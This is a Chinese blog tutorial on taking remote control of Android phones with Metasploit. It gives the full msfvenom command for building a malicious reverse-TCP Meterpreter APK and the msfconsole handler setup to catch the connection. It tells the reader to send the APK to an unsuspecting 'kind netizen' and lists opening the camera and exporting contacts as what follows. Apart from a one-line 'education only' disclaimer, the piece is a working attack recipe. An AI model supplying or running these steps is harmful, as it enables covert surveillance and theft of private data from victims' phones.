Metasploit框架远程控制入侵手机教程

相关声明

本教程仅作为Metasploit教育目的,请勿用于非法用途。

相关阅读

原理依旧是Reverse shell(反弹shell),我们之前讲过,您可以翻阅之前的视频,之前是反弹shell控制计算机,今天是控制手机,思路是一致的

工具准备

以下教程需要使用到Metasploit框架,您可以使用windows安装专业版,也可以使用Kali linux里自带的社区版

视频教程

图文教程

其实视频里并没有详细讲解恶意的APK文件MainActivity.apk是怎么生成的,我们在图文教程里做一个补充

生成APK文件

我们可以先查看有哪些payload

msfvenom -l payloads

我们可以看到有592个payload,我们只用andriod/meterpreter/reverse_tcp

图片[1]-Metasploit框架远程控制入侵手机教程-FancyPig's blog

生成恶意文件需要包括IP、端口,如果你不知道IP是多少可以使用下面的命令查看

ip addr

我们的IP地址是192.168.244.128

图片[2]-Metasploit框架远程控制入侵手机教程-FancyPig's blog

生成恶意APK文件的方法如下:

  • 192.168.244.128是我的kali linux虚拟机的IP地址
  • 4445是我随机选的端口
  • fancypig.apk是我生成apk文件
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=4445 R > fancypig.apk

这里可以看到已经生成好了

图片[3]-Metasploit框架远程控制入侵手机教程-FancyPig's blog

我们需要做的是将其发给热心网友

远程控制

发送之后,我们先启动metasploit渗透框架

msfconsole
图片[4]-Metasploit框架远程控制入侵手机教程-FancyPig's blog
use exploit/multi/handler

然后我们这里选择使用andriod反弹shell的模块

set payload /android/meterpreter/reverse_tcp

然后我们需要在这里设置IP地址,我们这里是内网环境,因此我需要先查看我的IP地址

因此回到一开始我们打开的终端,下面的命令要这么输入

set LHOST 192.168.244.128

端口的话我们这里设置的是4445

set LPORT 4445

然后,我们输入

exploit

如果热心网友的手机运行了软件,我们后面就可以进行更多的骚操作了!

譬如,打开摄像头、导出联系人等等

© 版权声明
THE END
喜欢就支持一下吧
点赞36赞赏 分享
评论 共149条

请登录后发表评论